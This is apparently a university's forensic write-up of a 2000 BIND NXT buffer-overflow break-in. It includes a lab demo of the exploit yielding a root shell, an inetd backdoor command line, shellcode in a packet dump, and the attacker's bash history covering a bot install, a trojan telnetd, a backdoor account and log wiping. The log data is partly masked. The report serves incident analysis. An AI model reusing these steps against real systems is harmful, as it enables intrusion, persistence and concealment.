Hacker compromised
victim1.ie | (137.189.victim1) |
victim2.ie | (137.189.victim2) |
Victim_Net previous intranet gateway | (137.189.victim3) |
Victim_Net current Mail server | (137.189.vicitm4) |
The hacker first set up a trap at a DNS server (xx0.yy0.33.45) of a certain domain.
He/she started up his/her hacker program binded at 53 port and waiting for
the victim DNS query. When the hacker make the victim host to DNS query the hacker
host (says using nslookup), the hacker program at the hacker DNS server will
buffer overflow the victim host and get the root access by starting up a root shell.
See
http://www.cert.org/advisories/CA-99-14-bind.html
A simple demo to show how it works
Hacker domain | bait.hkntec.net |
Hacker DNS server (i.e. DNS server of bait.hkntec.net domain) | ntec84.fox.hkntec.net (192.168.128.84) |
Victim host (host running BIND 8.2 named, whether it is DNS server or not, it doesn't matter) | victim.fox.hkntec.net (192.168.128.50) |
The hacker needs to point the hacker domain (bait.hkntec.net) to the hacker host (192.168.128.84) first.
; Data file of hostnames in this zone. ; @ IN SOA hkntec.net. shlam.ie.cuhk.edu.hk. ( 2000007102 ; serial, todays date + todays serial # 300 ; refresh, seconds 60 ; retry, seconds 1W ; expire, seconds 8H ) ; minimum, seconds NS ns.hkntec.net. ; bait IN NS ntec84.fox.hkntec.net.At the hacker host (192.168.128.84) try to probe the victim BIND version and OS
root@ntec84 ~]$ dig @192.168.128.50 version.bind chaos txt | grep \"8 VERSION.BIND. 0S CHAOS TXT "8.2.1" [root@ntec84 ~]$ telnet 192.168.128.50 Trying 192.168.128.50... Connected to victim (192.168.128.50). Escape character is '^]'. Red Hat Linux release 6.1 (Cartman) Kernel 2.2.12-20 on an i686 login: Login incorrectThen the hacker run the buffer overflow program. This program will bind the domain port 53.
ntec84:/tmp> ./bind_hack 1Now at any host try to make the victim host to query bait.hkntec.net domain
ntec4:/home/data/shlam> nslookup Default Server: fortress.fox.hkntec.net Address: 192.168.128.230 > server victim.fox.hkntec.net Default Server: victim.fox.hkntec.net Address: 192.168.128.50 > set type=ns > bait.hkntec.net Server: victim.fox.hkntec.net Address: 192.168.128.50 Non-authoritative answer: bait.hkntec.net nameserver = ntec84.fox.hkntec.net Authoritative answers can be found from: ntec84.fox.hkntec.net internet address = 192.168.128.84 > set type=a > www.bait.hkntec.net Server: victim.fox.hkntec.net Address: 192.168.128.50 ...Now the victim host try to resolve www.bait.hkntec.net host by querying the hacker DNS server via domain port 53.
When the victim hosts query the hacker DNS server, the hacker program will buffer overflow the NXT record and then get a root shell at the victim host.
ntec84:/tmp> ./bind_hack 1 Received request from 192.168.128.50:1025 for www.bait.hkntec.net type=1 Entering proxyloop.. Linux victim 2.2.12-20 #1 Mon Sep 27 10:40:35 EDT 1999 i686 unknown / uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) whoami root hostname victim echo "ingreslock stream tcp nowait root /bin/sh sh -i" > /tmp/h /usr/sbin/inetd /tmp/h ntec84:/tmp> telnet victim ingreslock Trying 192.168.128.50... Connected to victim (192.168.128.50). Escape character is '^]'. bash# whoami whoami root bash#When you look at the tcpdump, it shows:
victim:/tmp> tcpdump -x -e -s 5000 host ntec84 | tcpf Kernel filter, protocol ALL, datagram packet socket 14:29:52.475062 eth0 < 0:d0:9:2d:5b:79 0:0:0:0:0:1 ip 1514: ntec84.1101 > victim.domain: P 2899:4347(1448) ack 1 win 32120(DF) ... ... ... ... 9090 9090 9090 9090 9090 9090 9090 9090 ................ 9090 9090 9090 9090 9090 9090 9090 9090 ................ 9090 9090 9090 9090 9090 9090 9090 9090 ................ 9090 9090 9090 9090 9090 9090 9090 9090 ................ 9090 9090 9090 9090 9090 9090 9090 9090 ................ 9090 9090 9090 9090 9090 9090 9090 9090 ................ 9090 9090 9090 9090 9090 9090 9090 9090 ................ 9090 9090 9090 9090 9090 9090 9090 9090 ................ 9090 9090 9090 9090 9090 9090 9090 9090 ................ 9090 9090 9090 9090 9090 9090 9090 e9ac ................ 0100 005e 8976 0c8d 4608 8946 108d 462e ...^.v..F..F..F. 8946 1456 eb54 5e89 f3b9 0000 0000 ba00 .F.V.T^......... 0000 00b8 0500 0000 cd80 508d 5e02 b9ff ..........P.^... 0100 00b8 2700 0000 cd80 8d5e 02b8 3d00 ....'......^..=. 0000 cd80 5b53 b885 0000 00cd 805b b806 ....[S.......[.. 0000 00cd 808d 5e0b b80c 0000 00cd 8089 ......^......... f3b8 3d00 0000 cd80 eb2c e8a7 ffff ff2e ..=......,...... 0041 444d 524f 434b 5300 2e2e 2f2e 2e2f .ADMROCKS.../../ 2e2e 2f2e 2e2f 2e2e 2f2e 2e2f 2e2e 2f2e ../../../../../. 2e2f 2e2e 2f00 5eb8 0200 0000 cd80 89c0 ./../.^......... 85c0 0f85 8e00 0000 89f3 8d4e 0c8d 5618 ...........N..V. b80b 0000 00cd 80b8 0100 0000 cd80 e875 ...............u 0000 0010 0000 0000 0000 0074 6869 7369 ...........thisi 7373 6f6d 6574 656d 7073 7061 6365 666f ssometempspacefo 7274 6865 736f 636b 696e 6164 6472 696e rthesockinaddrin 7965 6168 7965 6168 696b 6e6f 7774 6869 yeahyeahiknowthi 7369 736c 616d 6562 7574 616e 7977 6179 sislamebutanyway 7768 6f63 6172 6573 686f 7269 7a6f 6e67 whocareshorizong 6f74 6974 776f 726b 696e 6773 6f61 6c6c otitworkingsoall 6973 636f 6f6c eb86 5e56 8d46 0850 8b46 iscool..^V.F.P.F 0450 ff46 0489 e1bb 0700 0000 b866 0000 .P.F.........f.. 00cd 8083 c40c 89c0 85c0 75da 6683 7e08 ..........u.f.~. 0275 d38b 5604 4a52 89d3 b900 0000 00b8 .u..V.JR........ 3f00 0000 cd80 5a52 89d3 b901 0000 00b8 ?.....ZR........ 3f00 0000 cd80 5a52 89d3 b902 0000 00b8 ?.....ZR........ 3f00 0000 cd80 eb12 5e46 4646 4646 c746 ?.......^FFFFF.F 1000 0000 00e9 fefe ffff e8e9 ffff ffe8 ................ 4ffe ffff 2f62 696e 2f73 6800 2d63 00ff O.../bin/sh.-c.. ffff ffff ffff ffff ffff ffff 0000 0000 ................ 706c 6167 7565 7a5b 4144 4d5d 3130 2f39 plaguez[ADM]10/9 392d 6578 6974 0090 9090 9090 9090 9090 9-exit.......... ...
The real case analysis
Although there are four hosts have been compromised, we only have a chance to exam 137.189.victim2. 137.189.victim1 was just OS upgraded before we investigate the case. 137.189.victim3 and 137.189.vicitm4 are under Victim_Net management. Victim_Net do not show any response of this investigation. Hence, we can only exam 137.189.victim2 which remains quite intact after the break-in.Feb 22nd
Feb 22nd - afterwards 0222.07:41:46.488 0222.07:41:49.904 137.189.victim2 xxx.252.35.201 06 23( telnet ) 1555 ( ) 10 520 0222.07:42:18.788 0222.07:42:21.648 137.189.victim2 xxx.252.35.201 06 23( telnet ) 1558 ( ) 9 480The hacker probably had scanned the 137.189.victim2 and found that the named port was open. He/she telnet the 137.189.victim2 to identify the OS of 137.189.victim2.
0222.07:42:57.760 0222.07:42:57.760 137.189.victim2 yyy.63.2.53 11 1024( ) 53 ( domain ) 1 63 0222.07:43:01.464 0222.07:43:01.464 137.189.victim2 yyy.8.10.90 11 1014( ) 53 ( domain ) 1 63 0222.07:43:01.900 0222.07:43:02.760 137.189.victim2 xx0.yy0.33.40 11 1024( ) 53 ( domain ) 2 126 0222.07:43:05.464 0222.07:43:06.464 137.189.victim2 xx0.yy0.33.45 11 1024( ) 53 ( domain ) 2 126The hacker made 137.189.victim2 to query the hacker domain and then connect to hacker host (xx0.yy0.33.45)0222.07:43:05.872 0222.07:43:30.544 137.189.victim2 xx0.yy0.33.45 06 53( domain ) 2212 ( ) 13 795Buffer overflow the 137.189.victim2 named0222.07:43:32.808 0222.07:43:32.808 137.189.victim2 xx0.yy0.33.45 01 0( ) 771 ( rtip ) 1 91 0222.07:43:41.yyy. 0222.07:43:55.hh. 137.189.victim2 xxx.252.35.201 06 23( telnet ) 1559 ( ) 31 1517Ping 137.189.victim2 and then telnet to 137.189.victim2 via his/her establish back door.0222.13:14:46.594 0222.13:14:46.594 137.189.victim2 uuu.254.23.184 06 1109( ) 113 ( auth ) 1 60 0222.13:14:46.82 0222.13:14:46.82 137.189.victim2 uuu.254.23.184 06 21( ftp ) 1562 ( ) 1 60 0222.13:14:51.202 0222.13:14:52.614 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1563 ( ) 5 1137 0222.13:15:21.838 0222.13:15:hh.310 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1570 ( ) 5 1207 0222.13:15:16.718 0222.13:15:19.362 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1565 ( ) 8 424 0222.13:15:38.774 0222.13:15:40.270 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1574 ( ) 5 1343 0222.13:15:34.634 0222.13:15:36.842 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1573 ( ) 6 320 0222.13:15:27.770 0222.13:15:33.190 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1572 ( ) 17 892 0222.13:14:47.34 0222.13:15:43.690 137.189.victim2 uuu.254.23.184 06 21( ftp ) 1562 ( ) 46 3742 0222.12:57:57.174 0222.13:16:38.358 137.189.victim2 uuu.254.23.184 06 23( telnet ) 1539 ( ) 841 119148 0222.13:17:12.918 0222.13:17:12.918 137.189.victim2 uuu.254.23.184 06 1110( ) 113 ( auth ) 1 60 0222.13:17:11.874 0222.13:17:11.874 137.189.victim2 uuu.254.23.184 06 21( ftp ) xxx6 ( ) 1 60 0222.13:17:34.153 0222.13:17:35.533 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1591 ( ) 5 268 0222.13:17:30.805 0222.13:17:32.345 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1590 ( ) 5 1405 0222.13:17:27.513 0222.13:17:28.933 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) xxx9 ( ) 5 268 0222.13:17:19.637 0222.13:17:21.169 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) xxx8 ( ) 5 1344 0222.13:17:14.305 0222.13:17:38.341 137.189.victim2 uuu.254.23.184 06 21( ftp ) xxx6 ( ) 36 2923 0222.13:17:37.421 0222.13:17:38.853 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1592 ( ) 5 1464 0222.13:17:32.429 0222.13:18:15.77 137.189.victim2 uuu.254.23.184 06 23( telnet ) 1539 ( ) 8 1738then a lots of FTP transfer0222.13:29:51.371 0222.13:29:57.515 137.189.victim2 ggg.233.ttt.6 06 1116( ) 6667 ( ) 8 638 0222.13:30:25.231 0222.13:30:25.563 137.189.victim2 rrr.37.45.2 06 113( auth ) 1434 ( ) 3 124 0222.13:30:54.755 0222.13:30:55.215 137.189.victim2 vvv.161.0.254 06 113( auth ) 1148 ( ) 3 124 0222.13:30:54.291 0222.13:30:56.151 137.189.victim2 vvv.161.0.254 06 1118( ) 6667 ( ) 6 358 0222.13:30:hh.911 0222.13:31:13.183 137.189.victim2 rrr.37.45.2 06 1117( ) 6667 ( ) 11 705 0222.13:31:22.795 0222.13:31:hh.615 137.189.victim2 ttt.116.202.42 06 113( auth ) 2143 ( ) 3 152 0222.13:31:22.187 0222.13:31:29.215 137.189.victim2 ttt.116.202.42 06 1119( ) 6667 ( ) 7 489 0222.13:31:39.839 0222.13:31:40.267 137.189.victim2 vvv.154.rrr.hh. 06 113( auth ) 2661 ( ) 3 124 0222.13:31:39.427 0222.13:31:41.67 137.189.victim2 vvv.154.rrr.hh. 06 1120( ) 6667 ( ) 6 362 0222.13:32:00.695 0222.13:32:00.695 137.189.victim2 rrr.37.45.2 06 1117( ) 6667 ( ) 1 74 0222.13:32:00.959 0222.13:32:01.363 137.189.victim2 vvv.159.0.90 06 113( auth ) 1061 ( ) 3 124 0222.13:32:00.547 0222.13:32:02.279 137.189.victim2 vvv.159.0.90 06 1121( ) 6667 ( ) 5 324 0222.13:32:37.843 0222.13:32:38.vvv. 137.189.victim2 fff.163.216.60 06 113( auth ) fff. ( ) 3 164 0222.13:32:37.191 0222.13:32:41.895 137.189.victim2 fff.163.216.60 06 1122( ) 6667 ( ) 8 551 0222.13:32:54.43 0222.13:32:54.387 137.189.victim2 fff.164.211.2 06 113( auth ) 46hh. ( ) 3 124 0222.13:32:53.735 0222.13:32:58.135 137.189.victim2 fff.164.211.2 06 1123( ) 6667 ( ) 7 488 0222.13:33:31.947 0222.13:33:34.419 137.189.victim2 hh.8.4.32 06 1080( ) 3359 ( ) 4 160 0222.13:33:35.723 0222.13:33:35.723 137.189.victim2 rrr.37.45.2 06 1117( ) 6667 ( ) 1 74 0222.13:33:23.167 0222.13:34:11.839 137.189.victim2 199.2.32.11 06 113( auth ) 52273 ( ) 7 284 0222.13:21:27.603 0222.13:34:hh.839 137.189.victim2 uuu.254.23.184 06 23( telnet ) 1539 ( ) 762 61422 0222.13:33:22.443 0222.13:34:52.7 137.189.victim2 199.2.32.11 06 11hh. ) 6667 ( ) 22 mmm.Start the IRC bot at 6667 portThe other three hosts were also compromised on 22nd Feb
137.189.victim3
0222.06:12:40.939 0222.06:12:41.263 137.189.victim3 hh.8.44.15 06 53( domain ) 4339 ( ) 3 164 0222.06:25:53.937 0222.06:25:53.937 137.189.victim3 hh.8.44.15 11 53( domain ) 1899 ( ) 1 86 0222.07:35:39.409 0222.07:35:42.585 137.189.victim3 xxx.252.35.201 06 23( telnet ) 1547 ( ) 10 520 0222.07:36:14.829 0222.07:36:14.829 137.189.victim3 fff.41.0.4 11 1028( ) 53 ( domain ) 1 45 0222.07:36:14.485 0222.07:36:14.485 137.189.victim3 ttt.112.36.4 11 1028( ) 53 ( domain ) 1 64 0222.07:36:22.157 0222.07:36:42.157 137.189.victim3 xx0.yy0.33.40 11 1028( ) 53 ( domain ) 2 128 0222.07:36:14.829 0222.07:36:50.157 137.189.victim3 xx0.yy0.33.45 11 1028( ) 53 ( domain ) 3 ttt 0222.07:36:18.157 0222.07:37:06.157 137.189.victim3 xx0.yy0.33.42 11 1028( ) 53 ( domain ) 3 ttt 0222.07:37:38.157 0222.07:37:38.157 137.189.victim3 xx0.yy0.33.45 11 53( domain ) 3003 ( ) 1 64 0222.07:37:22.157 0222.07:37:58.157 137.189.victim3 xx0.yy0.33.40 11 1028( ) 53 ( domain ) 2 127 0222.07:37:54.157 0222.07:37:54.157 137.189.victim3 xx0.yy0.33.42 11 1028( ) 53 ( domain ) 1 63 0222.07:37:50.305 0222.07:38:02.157 137.189.victim3 xx0.yy0.33.45 11 1028( ) 53 ( domain ) 2 126 0222.07:38:32.449 0222.07:38:32.449 137.189.victim3 xx0.yy0.33.45 01 0( ) 771 ( rtip ) 1 91 0222.07:38:02.565 0222.07:38:19.521 137.189.victim3 xx0.yy0.33.45 06 53( domain ) 2208 ( ) 13 795 0222.07:38:33.708 0222.07:39:01.640 137.189.victim3 xxx.252.35.201 06 23( telnet ) 1548 ( ) 55 2611 0222.11:45:05.207 0222.11:45:06.695 137.189.victim3 137.189.hh..152 06 139(netbios-s) 2289 ( ) 4 160 0222.11:45:06.707 0222.11:45:09.711 137.189.victim3 137.189.hh..152 01 0( ) 771 ( rtip ) 3 318 0222.12:33:10.52 0222.12:34:33.676 137.189.victim3 xxx.252.36.43 06 23( telnet ) 1056 ( ) 219 50268137.189.vicitm4
0222.06:12:40.107 0222.06:13:25.431 137.189.vicitm4 hh.8.44.15 06 53( domain ) 4297 ( ) 7 372 0222.06:14:13.431 0222.06:14:13.431 137.189.vicitm4 hh.8.44.15 06 53( domain ) 4297 ( ) 1 52 0222.06:15:49.427 0222.06:15:49.427 137.189.vicitm4 hh.8.44.15 06 53( domain ) 4297 ( ) 1 52 0222.06:25:53.897 0222.06:25:53.897 137.189.vicitm4 hh.8.44.15 11 53( domain ) 1895 ( ) 1 86 0222.07:29:00.330 0222.07:29:04.78 137.189.vicitm4 xxx.252.35.201 06 23( telnet ) 1536 ( ) 11 566 0222.07:30:50.169 0222.07:30:52.961 137.189.vicitm4 xxx.252.35.201 06 23( telnet ) 1538 ( ) 9 486 0222.07:31:04.49 0222.07:31:04.49 137.189.vicitm4 yyy.8.10.90 11 10hh. ) 53 ( domain ) 1 64 0222.07:31:04.693 0222.07:31:04.693 137.189.vicitm4 ttt.5.5.hh. 11 10hh. ) 53 ( domain ) 1 45 0222.07:31:12.601 0222.07:31:32.601 137.189.vicitm4 xx0.yy0.33.40 11 10hh. ) 53 ( domain ) 2 128 0222.07:31:04.693 0222.07:31:40.601 137.189.vicitm4 xx0.yy0.33.45 11 10hh. ) 53 ( domain ) 3 ttt 0222.07:31:51.565 0222.07:31:52.817 137.189.vicitm4 xxx.252.35.201 06 23( telnet ) 1538 ( ) 2 80 0222.07:31:08.601 0222.07:31:56.601 137.189.vicitm4 xx0.yy0.33.42 11 10hh. ) 53 ( domain ) 3 ttt 0222.07:32:12.601 0222.07:32:12.601 137.189.vicitm4 xx0.yy0.33.40 11 10hh. ) 53 ( domain ) 1 64 0222.07:32:16.301 0222.07:32:33.201 137.189.vicitm4 xxx.252.35.201 06 23( telnet ) 1540 ( ) 28 1334 0222.07:32:28.601 0222.07:32:28.601 137.189.vicitm4 xx0.yy0.33.45 11 53( domain ) 3003 ( ) 1 64 0222.07:32:47.577 0222.07:32:57.129 137.189.vicitm4 xxx.252.35.201 06 23( telnet ) 1541 ( ) 20 988137.189.victim1
0222.07:39:52.384 0222.07:39:52.384 137.189.victim1 ttt.5.5.hh. 11 10hh. ) 53 ( domain ) 1 63 0222.07:39:52.560 0222.07:40:04.152 137.189.victim1 xx0.yy0.33.40 11 10hh. ) 53 ( domain ) 2 126 0222.07:39:57.44 0222.07:40:00.hh. 137.189.victim1 xxx.252.35.201 06 23( telnet ) 1551 ( ) 10 526 0222.07:39:56.152 0222.07:40:12.152 137.189.victim1 xx0.yy0.33.42 11 10hh. ) 53 ( domain ) 2 126 0222.07:40:00.152 0222.07:40:20.152 137.189.victim1 xx0.yy0.33.45 11 10hh. ) 53 ( domain ) 2 126 0222.07:40:29.792 0222.07:40:29.792 137.189.victim1 sss.188.179.38 11 1033( ) 4000 ( ) 1 38 0222.07:40:20.620 0222.07:40:35.116 137.189.victim1 xx0.yy0.33.45 06 53( domain ) 2211 ( ) 14 847 0222.07:40:52.300 0222.07:40:52.300 137.189.victim1 xx0.yy0.33.45 01 0( ) 771 ( rtip ) 1 91 0222.07:41:13.328 0222.07:41:32.996 137.189.victim1 xxx.252.35.201 06 23( telnet ) 1552 ( ) 45 2131This the ftp tranfer to mcgill U. It matches the information provided by mcgill U.
0222.12:57:46.837 0222.12:58:35.685 137.189.victim1 sss.188.153.116 11 1027( ) 4000 ( ) 4 156 0222.12:58:25.737 0222.12:58:25.737 137.189.victim1 mmm.206.73.143 06 1058( ) 21 ( ftp ) 1 52 0222.12:58:32.517 0222.12:58:32.797 137.189.victim1 mmm.206.73.143 06 113( auth ) 3211 ( ) 3 164 0222.12:58:33.72 0222.12:58:53.756 137.189.victim1 mmm.206.73.143 06 1058( ) 21 ( ftp ) 9 506 0222.12:59:04.464 0222.12:59:04.464 137.189.victim1 mmm.206.73.143 06 1061( ) 20 (ftp-data ) 1 60 0222.12:58:55.396 0222.12:58:55.700 137.189.victim1 mmm.206.73.143 06 1060( ) 21 ( ftp ) 2 112 0222.12:59:11.160 0222.12:59:11.160 137.189.victim1 mmm.206.73.143 06 1063( ) 20 (ftp-data ) 1 60 0222.12:59:04.796 0222.12:59:04.796 137.189.victim1 mmm.206.73.143 06 1061( ) 20 (ftp-data ) 3 156 0222.12:58:56.36 0222.12:58:56.360 137.189.victim1 mmm.206.73.143 06 113( auth ) 3213 ( ) 3 164 0222.12:59:11.432 0222.12:59:11.432 137.189.victim1 mmm.206.73.143 06 1063( ) 20 (ftp-data ) 3 156 0222.12:58:56.688 0222.12:59:39.520 137.189.victim1 mmm.206.73.143 06 1060( ) 21 ( ftp ) 26 1542 0222.12:59:38.932 0222.12:59:38.932 137.189.victim1 mmm.206.73.143 06 1076( ) 20 (ftp-data ) 1 60 0222.12:59:39.200 0222.12:59:39.200 137.189.victim1 mmm.206.73.143 06 1076( ) 20 (ftp-data ) 3 156 0222.12:59:29.108 0222.12:59:29.108 137.189.victim1 mmm.206.73.143 06 1065( ) 20 (ftp-data ) 3 156 0222.12:59:28.820 0222.12:59:28.820 137.189.victim1 mmm.206.73.143 06 1065( ) 20 (ftp-data ) 1 60 0222.12:57:48.308 0222.12:59:39.876 137.189.victim1 xxx.252.36.43 06 23( telnet ) 1062 ( ) 102 8782 0222.12:59:33.384 0222.12:59:46.832 137.189.victim1 sss.188.153.116 11 1027( ) 4000 ( ) 2 76 0222.13:01:09.916 0222.13:01:11.308 137.189.victim1 xxx.252.36.43 06 23( telnet ) 1062 ( ) 5 211 0222.13:02:02.892 0222.13:02:02.892 137.189.victim1 sss.188.153.116 11 1027( ) 4000 ( ) 1 38 0222.13:03:10.716 0222.13:03:10.716 137.189.victim1 mmm.206.73.143 06 1086( ) 20 (ftp-data ) 1 60 0222.13:03:01.656 0222.13:03:hh.328 137.189.victim1 mmm.206.73.143 06 1060( ) 21 ( ftp ) 15 915 0222.13:03:20.308 0222.13:03:20.580 137.189.victim1 mmm.206.73.143 06 1087( ) 20 (ftp-data ) 5 260 0222.13:03:10.1000 0222.13:03:11.944 137.189.victim1 mmm.206.73.143 06 1086( ) 20 (ftp-data ) 12 624 0222.13:03:20.32 0222.13:03:20.32 137.189.victim1 mmm.206.73.143 06 1087( ) 20 (ftp-data ) 1 60 0222.13:03:46.8hh. 0222.13:03:46.8hh. 137.189.victim1 sss.188.153.116 11 1027( ) 4000 ( ) 1 38 0222.13:03:01.656 0222.13:04:02.652 137.189.victim1 xxx.252.36.43 06 23( telnet ) 1062 ( ) 131 7300 0222.13:05:hh.331 0222.13:05:25.211 137.189.victim1 xxx.252.36.43 06 23( telnet ) 1062 ( ) 4 184 cove ftp victim1.ie.cuhk. Mon Feb 21 23:59 - 00:03 (00:04) Mon Feb 21 23:59:28 2000 1 victim1.ie.cuhk.edu.hk 494 /tmp/egg/specialk.conf b _ o r cove ftp 0 * c Mon Feb 21 23:59:39 2000 1 victim1.ie.cuhk.edu.hk 749 /tmp/egg/motd b _ o r cove ftp 0 * c Tue Feb 22 00:03:10 2000 1 victim1.ie.cuhk.edu.hk 28hh. /tmp/egg/special-k.tcl b _ o r cove ftp 0 * c Tue Feb 22 00:03:20 2000 1 victim1.ie.cuhk.edu.hk 6483 /tmp/egg/BitchX1.1.tcl b _ o r cove ftp 0 * c (All times are North American Eastern, -0500 from UTC.)137.189.victim2 was running eggdrop IRC bot April 7thGet the security alert from McGill U and start investigation.
Hacker Activities at 137.189.victim2
From the /.bash_history, we pick up this:whoami less /var/log/secure pico -w /var/log/securechange the logging
w ls top cat /etc/passwd ls /data/home/ansers ls /home/testtube netstat uptime finger ansers finger testtube finger eric finger recruit ls /data df ls /data2 ls / ls /download cd .. cd sbin ls ls -F ls --color cd .. ls cd etc ls cd .. ls ls bin ls home ls ls mnt ls mnt/cdrom ls pef1 ls usr cd usr/sbin ls --color cd .. cd .. ls cd var ls -F cd .. ls root ls root -la ls ls bin -Fcheck out the system environment
ls cd dev ls cd .. ls cd dev mkdir e cd e ncftp ls tar -zxvf eggdrop1.4.2.tar.gz cd eggdrop1.4.2 ./configure make cp /tmp/hed . ls /tmp rm /tmp/hed mv /tmp/BitchX1.1.tcl ./scripts/ mv /tmp/special-k.tcl ./scripts/ mv /tmp/wh0r3.tcl ./scripts/ mv /tmp/motd ./ ls /tmp ls pico -w hed rm hed w ls ./assgroove chmod u+x groove chmod u+x assgroove ./assgroove pwd ./eggdrop ./eggdrop -m assgroove telnet localhost 2012Build and run the eggdrop
w cd scripts/ pico -w botchk cd .. ls -la ps x ls mv assgroove in.telnetd pico -w scripts/botchk cd .. ./in.telnetd ls -la in.tel ls -la in.telnetd ls cd eggdrop1.4.2 ./in.telnetd ls -la in.telnetd chmod +x in.telnetd pico -w in.telnetd pico -w in.telnetd pico -w cron crontab cron crontab -l scrbotchk ./scripts/botchk ls ./in.telnetd ls in.telnetd ls -la in.telnetd mv eggdrop in.ftpd ./scripts/botchkBuild the telnet trojan horse
cd / cd var/log pico -w secure ls cat messages ls rm wtmp last mv wtmp.1 wtmp tail xferlog pico -w xferlog ls cd /root ls ls -la history rm .historyclear the log
exit useradd adduser /sbin/useradd /sbi/nadduser /sbin/adduser /usr/local/sbin/adduser /usr/local/sbin/useradd locate locate useradd /usr/sbin/useradd /usr/sbin/useradd deamon -d /tmp cat /etc/passwd chpasswd passwd deamon pico -w /etc/passwdcreate backdoor account
w w cd /var/log pico -w secure w exit pico -w secure ls cat xferlog rm xferlog ls cat lastlog ls last lastlog rm lastlog ls mv wtmp.1 wtmpclear the log
locate egg cd /dev/e/eggdrop1.4.2 mv /tmp/special-k.1.pre2.tcl ./scripts/ ls cat in.ftpd ps x pico -w in.telnetd logout exit cp /var/log/wtmp.1 /var/log/wtmp cd /dev/e ls ncftp w cd /var/log ls tail secure rm secure dd > secure cat xferlog.1 ls exitclear the log
The files that the hacker may touch up on that day (22nd Feb)Access time Modification time Mon Apr 10 12:07:55 2000 Tue Feb 22 13:51:27 2000 / Mon Apr 10 12:07:55 2000 Tue Feb 22 16:16:54 2000 /data/home/ansers/source_code/ansers_dir/src_4 Mon Apr 10 12:07:56 2000 Tue Feb 22 16:03:hh.2000 /data/home/ansers/source_code/jasmine_dir/text Mon Apr 10 12:07:56 2000 Tue Feb 22 15:51:11 2000 /data/home/ansers/public_html/DDL Mon Apr 10 12:07:56 2000 Tue Feb 22 15:51:25 2000 /data/home/ansers/public_html/include Fri Mar 31 23:52:02 2000 Tue Feb 22 15:53:06 2000 /data/home/ansers/public_html/cmpl Thu Feb hh.19:50:23 2000 Tue Feb 22 11:58:07 2000 /data/home/ansers/public_html/C_prog/upload_batld.c Wed Mar 1 22:03:03 2000 Tue Feb 22 11:59:55 2000 /data/home/ansers/public_html/C_prog/upload_batle.c Thu Feb hh.19:51:33 2000 Tue Feb 22 11:58:19 2000 /data/home/ansers/public_html/upload_batld Thu Feb hh.19:51:33 2000 Tue Feb 22 12:00:23 2000 /data/home/ansers/public_html/upload_batle Fri Apr 7 04:08:38 2000 Tue Feb 22 13:09:18 2000 /dev/e Fri Apr 7 04:08:38 2000 Tue Feb 22 13:09:54 2000 /dev/e/eggdrop1.4.2/doc Tue Feb 22 13:09:54 2000 Tue Feb 22 13:09:55 2000 /dev/e/eggdrop1.4.2/doc/Makefile Fri Apr 7 03:11:39 2000 Tue Feb 22 13:14:26 2000 /dev/e/eggdrop1.4.2/motd Mon Apr 10 12:10:00 2000 Tue Feb 22 13:42:16 2000 /dev/e/eggdrop1.4.2/scripts/botchk Tue Feb 22 13:09:55 2000 Tue Feb 22 13:09:55 2000 /dev/e/eggdrop1.4.2/scripts/Makefile Mon Apr 10 11:50:01 2000 Tue Feb 22 13:12:16 2000 /dev/e/eggdrop1.4.2/scripts/BitchX1.1.tcl Mon Mar 27 06:18:10 2000 Tue Feb 22 13:12:30 2000 /dev/e/eggdrop1.4.2/scripts/special-k.tcl Tue Apr 4 12:31:55 2000 Tue Feb 22 13:12:34 2000 /dev/e/eggdrop1.4.2/scripts/wh0r3.tcl Fri Apr 7 04:08:38 2000 Tue Feb 22 13:13:21 2000 /dev/e/eggdrop1.4.2/src Fri Apr 7 04:08:38 2000 Tue Feb 22 13:13:hh.2000 /dev/e/eggdrop1.4.2/src/md5 Tue Feb 22 13:13:21 2000 Tue Feb 22 13:09:56 2000 /dev/e/eggdrop1.4.2/src/md5/Makefile Tue Feb 22 13:13:26 2000 Tue Feb 22 13:13:25 2000 /dev/e/eggdrop1.4.2/src/md5/md5c.o Fri Apr 7 04:08:38 2000 Tue Feb 22 13:17:27 2000 /dev/e/eggdrop1.4.2/src/mod Fri Apr 7 04:08:38 2000 Tue Feb 22 13:13:30 2000 /dev/e/eggdrop1.4.2/src/mod/assoc.mod Fri Apr 7 04:08:38 2000 Tue Feb 22 13:13:35 2000 /dev/e/eggdrop1.4.2/src/mod/blowfish.mod Fri Apr 7 04:08:38 2000 Tue Feb 22 13:14:30 2000 /dev/e/eggdrop1.4.2/src/mod/channels.mod Fri Apr 7 04:08:38 2000 Tue Feb 22 13:14:34 2000 /dev/e/eggdrop1.4.2/src/mod/console.mod Fri Apr 7 04:08:38 2000 Tue Feb 22 13:14:38 2000 /dev/e/eggdrop1.4.2/src/mod/ctcp.mod Fri Apr 7 04:08:38 2000 Tue Feb 22 13:15:12 2000 /dev/e/eggdrop1.4.2/src/mod/filesys.mod Fri Apr 7 04:08:38 2000 Tue Feb 22 13:16:06 2000 /dev/e/eggdrop1.4.2/src/mod/irc.mod Fri Apr 7 04:08:38 2000 Tue Feb 22 13:16:17 2000 /dev/e/eggdrop1.4.2/src/mod/notes.mod Fri Apr 7 04:08:38 2000 Tue Feb 22 13:16:23 2000 /dev/e/eggdrop1.4.2/src/mod/seen.mod Fri Apr 7 04:08:38 2000 Tue Feb 22 13:16:44 2000 /dev/e/eggdrop1.4.2/src/mod/server.mod Fri Apr 7 04:08:38 2000 Tue Feb 22 13:17:02 2000 /dev/e/eggdrop1.4.2/src/mod/share.mod Fri Apr 7 04:08:38 2000 Tue Feb 22 13:17:19 2000 /dev/e/eggdrop1.4.2/src/mod/transfer.mod Fri Apr 7 04:08:38 2000 Tue Feb 22 13:17:26 2000 /dev/e/eggdrop1.4.2/src/mod/wire.mod Fri Apr 7 04:08:38 2000 Tue Feb 22 13:17:27 2000 /dev/e/eggdrop1.4.2/src/mod/woobie.mod Tue Feb 22 13:13:26 2000 Tue Feb 22 13:09:56 2000 /dev/e/eggdrop1.4.2/src/mod/Makefile Tue Feb 22 13:13:30 2000 Tue Feb 22 13:13:30 2000 